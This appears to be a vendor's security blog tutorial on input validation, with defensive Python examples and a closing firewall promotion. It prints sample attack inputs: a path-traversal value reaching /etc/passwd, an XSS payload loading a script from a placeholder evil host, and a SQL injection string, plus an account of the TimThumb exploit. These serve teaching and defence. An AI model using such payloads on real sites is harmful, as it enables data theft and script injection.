Input Validation for Website Security

Web forms are incredibly useful tools. They allow you to gather important information about potential clients and site visitors, collect comments and feedback, upload files, subscribe new users to your blog, or even collect payment details. But if your forms aren’t properly validating user inputs, you might be in for a nasty surprise: a variety of issues can occur if data is uploaded to your site’s environment without specific controls.

In fact, bad actors regularly test forms and enter all sorts of malicious data (including JavaScript or SQL queries) which, if not properly sanitized and validated, can be executed on your website.

So, let’s take a look at what input validation is and why it’s so important — along with some examples of how to ensure proper validation to prevent arbitrary file uploads, cross-site scripting, and SQL injection attacks.

Contents:

What is input validation?
Why is input validation important?
What’s an example of input validation?
Which attacks exploit improper input validation?
How to implement input validation

What is input validation?

Input validation is a technique used to ensure that data entered into any system, website, or web app is valid and meets specific criteria. It’s typically implemented for websites and web apps that receive and process user input (such as forms) to check that the data is properly formed. And it’s one of the most essential steps you can take to prevent unexpected behavior on your site.

There are many different types and levels of validation, from syntactic validation (which checks the format, type, and length of the input) to semantic validation (which ensures supplied values make sense in the application context).
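To make the distinction concrete, here is a minimal sketch based on a hypothetical booking form with a check-in and a check-out date. The function names and the form itself are assumptions for illustration only. The first function applies a syntactic rule (the value must look like YYYY-MM-DD), while the second applies a semantic rule (the two dates must make sense together).

```python
import re
from datetime import date

# Syntactic rule: exactly YYYY-MM-DD, ASCII digits only.
DATE_RE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")


def parse_date(text: str) -> date:
    """Syntactic validation: check the shape of the value, then convert it."""
    if not DATE_RE.fullmatch(text):
        raise ValueError("date must use the YYYY-MM-DD format")
    year, month, day = (int(part) for part in text.split("-"))
    # date() raises ValueError for impossible dates such as 2024-02-30.
    return date(year, month, day)


def validate_booking(check_in: str, check_out: str) -> tuple[date, date]:
    """Semantic validation: the two dates must also make sense together."""
    start, end = parse_date(check_in), parse_date(check_out)
    if end <= start:
        raise ValueError("check-out must be later than check-in")
    return start, end
```

A value such as "2024-5-1" fails the syntactic check, while a well-formed pair where check-out precedes check-in only fails the semantic one.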

If a website or app doesn’t perform proper input validation checks, malformed data may be entered to wreak havoc on the system or trigger malfunctions. For this reason, data from all untrusted sources (such as website visitors) should be validated as early as possible to mitigate risk.

Always validate all data from untrusted sources before performing any actions.

As a best practice, input validation should occur on both the client and the server. While client-side validation is certainly nice to have, it’s not enough on its own: attackers may pass unvalidated data through a specially crafted HTTP request that bypasses the site’s form validation entirely.

So, you’ll want server-side code to check and verify that it’s receiving valid data as soon as it’s been passed from the client side. And be sure to use that data only after proper sanitization!

A few guiding principles of input validation include:

Never, ever trust user input.
Validating and rejecting inputs is better than sanitizing them.

So now that we have a general overview of what input validation is, let’s take a look at why we want to use it on our website and web apps.

Why is input validation important?

Input validation is important for three main reasons:

1 – Functionality

By verifying that data inputs are in the correct format and within expected ranges, you can ensure data is received and processed correctly by your website’s back-end. For example, if a user enters incorrect credit card details during your purchase process, you won’t be able to charge them.

Furthermore, if you process corrupt or invalid data, it could crash your web server — or an application might return incorrect results or simply fail to load.

2 – Security

Validating user inputs is extremely important for website security because it helps prevent bad actors from entering potentially harmful data, mitigating the risk of cross-site scripting (XSS) or SQL injection attacks.

3 – User experience

Input validation can drastically improve user experience by informing users if they have entered invalid data. For example, if a user accidentally provides their name instead of email address in a certain field, input validation can catch the error and inform them of the mistake.

Input validation example:

Let’s take a look at input validation for a new account creation signup form as an example.

Signup form input validation example

To properly validate the user’s input on this signup form, you would want to:

Check that their email address is using the correct format (i.e. it contains an ‘@’ symbol and follows email address syntax rules).
Check that the email address belongs to a valid domain name.
Check that the passwords are at least 8 characters long.
Check that the passwords are not longer than a certain number of characters.
Check that the passwords contain a mix of allowed special characters, letters, and numbers.
Check that the passwords match.

If the user’s input does not meet these criteria, you might display an error message and prevent the user from submitting the form until they enter valid data. This helps ensure that the website can process the user’s input properly, while also protecting your website from potential attacks that could exploit improperly validated input.
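The signup checks can be sketched on the server side roughly as follows. This is a minimal illustration, not a complete implementation: the maximum length, the set of allowed special characters, and the simplified email pattern are all assumptions, and the domain check (which would need a DNS lookup) is left out.

```python
import re
import string

MIN_PASSWORD_LEN = 8      # minimum length suggested in this article
MAX_PASSWORD_LEN = 128    # assumed upper bound
ALLOWED_SPECIALS = set("!@#$%^&*-_")  # assumed set of allowed special characters
ALLOWED_CHARS = set(string.ascii_letters + string.digits) | ALLOWED_SPECIALS

# Simplified email shape: local-part@label.label (not a full RFC parser).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def validate_signup(email: str, password: str, confirm: str) -> list[str]:
    """Return a list of error messages; an empty list means the input passed."""
    errors = []
    if not EMAIL_RE.fullmatch(email):
        errors.append("Enter a valid email address.")
    if len(password) < MIN_PASSWORD_LEN:
        errors.append(f"Password must be at least {MIN_PASSWORD_LEN} characters long.")
    if len(password) > MAX_PASSWORD_LEN:
        errors.append(f"Password must be at most {MAX_PASSWORD_LEN} characters long.")
    if not set(password) <= ALLOWED_CHARS:
        errors.append("Password contains characters that are not allowed.")
    has_letter = any(c in string.ascii_letters for c in password)
    has_digit = any(c in string.digits for c in password)
    has_special = any(c in ALLOWED_SPECIALS for c in password)
    if not (has_letter and has_digit and has_special):
        errors.append("Password must mix letters, numbers, and special characters.")
    if password != confirm:
        errors.append("Passwords do not match.")
    return errors
```

Returning every error at once, rather than stopping at the first one, lets the form show the user everything that needs fixing in a single pass.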

In summary, not only is validation important for security, but it’s crucial for your site’s functionality and user experience as well.

Which attacks exploit improper input validation?

There are several types of attacks that can exploit input validation issues, including local file inclusion (LFI), SQL injection, cross-site scripting (XSS), and arbitrary file uploads. Let’s take a look at a few examples of how these attacks may exploit vulnerable websites.

Local file inclusion

Imagine your web app offers a localized version of a document for several predefined countries. Users can select a country in the drop-down box in a web form.

Since the drop-down box provides a limited choice, you might assume it’s a safe input, so on the server side you simply copy the data from /path/to/documents/<country> (where <country> is the drop-down box choice) to the document generated for the visitor.

There is a large gaping hole in this solution, however. Attackers don’t always have to use your forms: they can craft HTTP requests with whatever data they want.

So, instead of a country (e.g. France), your server application may receive something like “../../../etc/passwd” in an HTTP request from a bad actor. And instead of sending along country-specific information, you end up handing over a list of server users or a configuration file with database passwords.

To mitigate this particular issue, your server application should validate that:

The input doesn’t contain any path-changing characters (such as slashes or “..” sequences).
The input belongs to a predefined set of values (e.g. in this case, check it against a list of known countries).
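Both checks can be sketched in a few lines. The country list here is a hypothetical stand-in for the drop-down values, and the function name is an assumption; the directory is the placeholder path used in the example above.

```python
from pathlib import Path

DOCUMENT_ROOT = Path("/path/to/documents")        # directory from the example above
KNOWN_COUNTRIES = {"France", "Germany", "Japan"}  # hypothetical drop-down values


def resolve_country_document(country: str) -> Path:
    """Map a submitted country to its document path, or raise ValueError."""
    # Check 1: reject path-changing characters outright.
    if "/" in country or "\\" in country or ".." in country or "\x00" in country:
        raise ValueError("country contains path characters")
    # Check 2: accept only values that the drop-down could have produced.
    if country not in KNOWN_COUNTRIES:
        raise ValueError("unknown country")
    return DOCUMENT_ROOT / country
```

The allowlist check alone would already reject “../../../etc/passwd”; the character check is kept as a second layer in case the list of known values is ever loosened.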

SQL injection

SQL injection attacks take advantage of improper input validation to insert malicious code into web forms or other user-input fields in an attempt to gain access to the website’s database.

For example, imagine your online store has a form that allows visitors to search for specific products by SKU in the following format: NNN-DDDDD-DD, where N is a capital letter, and D is a digit.

You’ll want to create a validation rule (for example, the regex ^[A-Z]{3}-\d{5}-\d{2}$, anchored so that the entire input must match) to reject incorrect inputs. If a malformed SKU gets through, your app simply won’t find anything. And if the app also lacks input sanitization when building its SELECT query, the consequences can be far worse.

Exploiting this scenario could allow a bad actor to enter a malicious SQL query as the search term, which could be executed by the database when the search is performed. This could allow the attacker to gain access to sensitive user information or financial records, or even to modify or delete data in your site’s database.
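As a rough sketch of the SKU search, the example below validates the input against the whole pattern and then passes it to the database through a query placeholder rather than by building the SQL string by hand. Placeholders are an additional technique beyond the validation rule itself. The products table, its columns, and the function names are assumptions, and SQLite stands in for whatever database the store actually uses.

```python
import re
import sqlite3

# Three capital letters, five digits, two digits; fullmatch() covers the whole input.
SKU_RE = re.compile(r"[A-Z]{3}-[0-9]{5}-[0-9]{2}")


def find_product(conn: sqlite3.Connection, sku: str):
    """Return the product name for a valid SKU, or None if nothing matches."""
    if not SKU_RE.fullmatch(sku):
        raise ValueError("SKU must look like ABC-12345-67")
    # The ? placeholder keeps the value out of the SQL text itself.
    row = conn.execute("SELECT name FROM products WHERE sku = ?", (sku,)).fetchone()
    return row[0] if row else None


def make_demo_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database with one hypothetical product."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (sku TEXT PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO products VALUES (?, ?)", ("ABC-12345-67", "Widget"))
    return conn
```

With this in place, a search term such as ABC-12345-67' OR '1'='1 is rejected by the validation rule before any query runs.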

Cross-site scripting (XSS)

Cross-site scripting (XSS) attacks can take advantage of improperly-validated user input to inject malicious code into your webpage.

As an example, imagine your website’s blog allows users to associate domain URLs with their author name.

You will want to validate that the link they provide is in the correct URL format and doesn’t contain forbidden characters. This will help prevent attackers from adding HTML tags or scripts that execute whenever their author name is displayed on your website.

For example, when a user specifies their name and website address, you expect the generated code to be:

<a href="https://example-user-site.com">commenter name</a>

But if a malicious user specifies something like this instead of the URL, then you’ll have a problem:

https://example-user-site[.]com"></a><script src="https://example-evil-site[.]xyz/xss.js"></script><a href="https://example-user-site[.]com

If your application doesn’t validate and sanitize this input, a malicious script could be injected into the web page with the comment. This will be executed every time someone loads the page, potentially allowing the hacker to perform unauthorized actions including stealing user data, injecting malicious redirects to spam websites, or injecting unwanted spam pop-ups.
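One way to approach the author link, sketched under a few assumptions: the list of forbidden characters and the function name are illustrative, only http and https links are accepted, and both values are HTML-escaped before they are placed in the markup.

```python
import html
from urllib.parse import urlsplit

# Characters that have no place in a plain profile URL (assumed list).
FORBIDDEN_CHARS = set("\"'<>`\\")


def author_link(name: str, url: str) -> str:
    """Build the author link, or raise ValueError if the URL is not acceptable."""
    if any(ch in FORBIDDEN_CHARS or ch.isspace() or not ch.isprintable() for ch in url):
        raise ValueError("URL contains forbidden characters")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("URL must be an absolute http(s) address")
    # Escape both values so they cannot break out of the attribute or the tag.
    return '<a href="{}">{}</a>'.format(html.escape(url, quote=True), html.escape(name))
```

Validation rejects the malicious URL shown above because it contains quotes and angle brackets, and escaping acts as a second layer for anything that validation lets through.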

Arbitrary file upload

Many sites allow users to upload documents. One of the most common use cases is uploading user profile pictures. But if you don’t check what kind of files a user uploads to your website for their profile picture, you may end up with a bunch of malicious files on your server, such as backdoors that execute on your server or malicious downloads served from it.
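A minimal sketch of a profile picture check might look like the following. The size limit, the accepted formats, and the function name are assumptions. Note that a matching file signature does not prove a file is harmless, so the sketch also stores the upload under a server-generated name with a known image extension instead of trusting the name supplied by the user.

```python
import secrets
from pathlib import PurePosixPath

MAX_BYTES = 2 * 1024 * 1024  # assumed size limit (2 MiB)

# Leading bytes ("magic numbers") of the accepted image formats.
SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def validate_profile_picture(filename: str, data: bytes) -> str:
    """Return a safe storage name for the upload, or raise ValueError."""
    ext = PurePosixPath(filename).suffix.lower()
    if ext not in SIGNATURES:
        raise ValueError("file type is not allowed")
    if len(data) > MAX_BYTES:
        raise ValueError("file is too large")
    if not data.startswith(SIGNATURES[ext]):
        raise ValueError("file content does not match its extension")
    # Never reuse the client-supplied name; generate one on the server.
    return secrets.token_hex(16) + ext
```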

One of the most famous cases of an arbitrary file upload vulnerability caused by insufficient user input validation was the TimThumb vulnerability, which resulted in hundreds of thousands of infected websites way back in 2011.

The exploit used TimThumb’s feature to create thumbnails of images which had been stored on trusted third-party sites. To resize these images, the files needed to be downloaded and stored in a cache directory so that the script didn’t have to download them every time.

Since TimThumb’s feature worked using a simple GET request (timthumb.php?src=http://trusted-site.tld/image.gif) which could be easily modified to download arbitrary files from the internet, the developer added rules that tried to ensure unwanted files couldn’t be erroneously downloaded. The script checked that the header of the file matched a header of an image file and identified whether the URL matched the list of trusted sites such as blogger.com, flickr.com, picasa.com, upload.wikimedia.org and a few more.

Since TimThumb only checked that the beginning of the URL matched an entry on its list of trusted sites, the approach completely neglected the possibility that a URL beginning with “http://blogger.com” might not actually belong to the blogger.com site. And this solution didn’t take into account that PHP ignores anything outside of the <?php ?> tags, allowing hackers to append malicious PHP code to the end of real images, which executed whenever the file was requested.

By creating numerous shadow domains whose names began with domains on TimThumb’s trusted site list, hackers were able to exploit the vulnerability and arbitrarily upload malicious files to affected websites.
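The difference between checking how a URL begins and checking which host it actually points to can be illustrated with a short sketch. This is not TimThumb’s actual code (the script was written in PHP); the function names and the attacker.example domain are hypothetical, and the trusted list only contains the hosts named above.

```python
from urllib.parse import urlsplit

TRUSTED_HOSTS = {"blogger.com", "flickr.com", "picasa.com", "upload.wikimedia.org"}


def prefix_check(url: str) -> bool:
    """Flawed check: only looks at how the URL string begins."""
    return any(url.startswith("http://" + host) for host in TRUSTED_HOSTS)


def hostname_check(url: str) -> bool:
    """Stricter check: the parsed hostname must equal a trusted host exactly."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and parts.hostname in TRUSTED_HOSTS
```

For a URL such as http://blogger.com.attacker.example/shell.php, the prefix check passes while the hostname check fails, because the parsed hostname is blogger.com.attacker.example rather than blogger.com. Subdomains of trusted hosts would need their own explicit entries in this sketch.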

How do I implement input validation on a website?

There are a number of steps you can take to implement input validation on your website:

1 – Pinpoint all the different types of data you might need to validate.

This includes form inputs, URL parameters, cookies, or any other user data that’s submitted on your site.

2 – Define appropriate validation rules for each type of data.

For example, you might want to check that all data is in the correct format (e.g. emails contain an @ symbol), does not contain any unauthorized words or characters, and is within a specific range (e.g. passwords are at least 8 characters long).

3 – Implement validation rules.

You may need to write some custom code to handle validation at the server level, or use a built-in function or library to perform the validation.

4 – Test your validation rules.

Make sure any rules you create are working properly: enter invalid data on your site to ensure it’s properly rejected, and enter valid data to ensure it’s accepted.
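Manual checks like these can also be captured as a small table of test cases that runs against each rule. The sketch below does this for a simplified email rule; the pattern, the function names, and the sample inputs are assumptions for illustration.

```python
import re

# Simplified email shape: local-part@label.label (not a full RFC parser).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_valid_email(value: str) -> bool:
    return bool(EMAIL_RE.fullmatch(value))


# Each case pairs an input with whether the rule should accept it.
CASES = [
    ("user@example.com", True),
    ("first.last+tag@mail.example.org", True),
    ("no-at-symbol", False),
    ("two@@example.com", False),
    ("user@example.com<script>", False),
    ("", False),
]


def failing_cases() -> list[tuple[str, bool]]:
    """Return every case where the rule disagrees with the expected result."""
    return [(value, expected) for value, expected in CASES
            if is_valid_email(value) != expected]
```

An empty result from failing_cases() means the rule accepts and rejects exactly what the table expects; any new bypass that turns up later can be added to the table as another case.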

5 – Monitor your website’s logs.

Check your website and server logs to verify that rules are being enforced and no malicious data is entered or executed on your site. Consider using a security plugin to help you with this.

Conclusion

As a rule of thumb, never trust data that’s passed to your server from the client side. Leverage input validation to ensure only properly formed data is entering your workflows. This helps prevent attackers from executing malicious query strings or JavaScript on your website. And keep in mind that input validation alone can’t prevent all attacks — but it can help minimize the attack surface as well as the impact that successful attacks have.

As an additional layer of security, consider using a web application firewall (WAF) to help enhance your website’s security and protect against SQL injection and cross-site scripting attacks. Check out our free 1-month Firewall trial and protect your site today.